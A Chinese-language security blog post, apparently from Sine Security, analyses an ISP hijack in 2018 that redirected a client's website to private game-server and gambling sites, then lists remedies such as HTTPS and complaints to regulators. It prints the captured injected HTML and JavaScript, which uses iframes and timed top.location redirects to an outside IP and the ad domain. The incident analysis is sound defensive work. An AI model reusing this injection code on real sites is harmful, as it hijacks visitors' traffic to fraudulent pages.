Sine安全-网络安全背后的巨人,提供服务器安全_服务器维护_网站安全解决方案

网站跳转到私服、博彩 DNS运营商劫持问题的解决

   

         最近客户网站经常被跳转到一些私服以及博彩网站上去,导致网站的访问流量急剧下滑,

客户的网站损失较大,问题发生在2018年4月初,一开始没有那么多客户访问网站被跳转,慢

慢的用户就开始投诉反馈了,说是网站跳转到另外一个网站上去了,跳转的网址是cq4sd9.qm

sw.club:1277  打开一看是私服广告网站。如下图:


 
 
经过我们SINE安全工程师对其服务器进行远程安全检测,分析,发现这次网站被跳转到另外一个

网站上去的问题,跟上次不太一样,没有发现网站代码被篡改,以前的跳转是根据搜索引擎来进

行判断条件跳转,从搜索引擎点击进去会直接跳转到赌博网站,而这次不管是从搜索引擎还是其

他直接输入域名都会被强制的跳转到私服网站上去。通过检查网站的访问日志也没发现异常的问

题,所以直接在用户的电脑里进行了远程抓包分析.

 
 
 
我们来看下抓取到的数据包,首先看到的就是网站首页整个数据包被替换成了劫持的代码:
 
<!DOCTYPE HTML><html><head><script>        (function(w){                var a7= w.a7 || {} ;              
 var d=document;                a7.u = function() {                        var f = d.location.href;                
               d.getElementById("m").src=f+(f.indexOf("?")<0 ? '?':'&')+'_t_t_t='+Math.random();      
                 };                a7.c = function() {                        d.getElementById('x').style.display=
"none";                };                w.a7 = a7;        })(window);</script><style>body {margin:0;co
lor:#000;overflow:hidden;padding:0;height:100%;font-family:Arial}#c{cursor:pointer;display:
block;position:absolute;border:1px;border-radius:1em;background-color:#fff;color:#555;z-in
dex:3;right:5px;top:5px;line-height:20px;text-align:center;width:20px;font-size:10px}#x{positi
on:absolute;z-index:2;left:-512px;top:10px;margin-left:50%;width:1024px;height:768px;}#i{d
isplay:block; position:absolute; z-index:1; width:100%; height:100%}</style></head><body
onLoad=a7.u()> <div id=i>        <iframe id=m frameborder=0 width=100% height=100%>
</iframe></div><div id=x>        <a id="c" onClick=a7.c()>X</a>        <iframe id=a width=10
24 height=768 scrolling=no frameborder=0></iframe></div><script>setTimeout(function()
{document.getElementById('a').src = 'http://121.42.246.234:8080/tx1d9djdd/1.html';},1000);
setTimeout(function(){document.getElementById('x').style.display = 'none';},16000);
</script></body></html>
 
http://121.42.246.234:8080/tx1d9djdd/1.html  这个劫持代码存放在阿里云的服务器里,直接

嵌入框架代码,进行网站跳转。看来是有目的的性的选择地区劫持,尤其是青岛联通线路。

 

 
 
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title></title>
</head>
 
<body style="margin:0">
<a href="http://cq4sd9.qmsw.club:1277/" target="_blank">
<img src="1.jpg" width="1024" height="768">
</a>
<div style="display:none">
 
<script src="http://s95.cnzz.com/stat.php?id=1261830135&web_id=1261830135" language="JavaScript"></script>
 
<script src="https://s13.cnzz.com/z_stat.php?id=1271906869&web_id=1271906869" language="JavaScript"></script>
<script src="https://s19.cnzz.com/z_stat.php?id=1273220936&web_id=1273220936" language="JavaScript"></script>
<script language="JavaScript">
setTimeout("top.location.href='http://cq4sd9.qmsw.club:1277/';", 1000);
</script>
 
</div>
</body>
</html>
 
那么遇到网站被运营商劫持该如何处理? 网站被跳转到另外一个网站上去怎么才能彻底的解决

问题呢?解决方案如下:
 
启用网站https协议,部署SSL证书,用https访问网站即可。
 
向本地的电信运营商进行投诉,直接打官方客服电话说明自己的问题,打开某一网址会直接跳

转到私服,博彩网站上,让他们抓紧解决问题,如果不解决直接投诉到工信部里去。
 
利用微博投诉运营商,微博@中国联通 @中国联通客服 还有自己当地的电信官方微博,把问题

反馈给他们,并转发。
 
实在不行就到工信部去投诉,工信部对于用户的投诉,尤其网站被跳转到私服、博彩网站上去这

样的问题,会直接处理,投诉的时候要用真实信息,核心真实身份后会立即处理。工信部投诉网

址 http://www.chinatcc.gov.cn:8080/cms/shensu/   
 
如果网站被跳转到别的网站上去,不是运营商劫持所致,那应该是自身的网站代码被黑客篡改了,

尤其网站在百度的里快照也会被篡改,像这种情况就得需要对网站程序代码进行安全检测,以及

网站漏洞修复,网站木马后门清除了,有条件的话建议找专业的网站安全公司处理。
分享: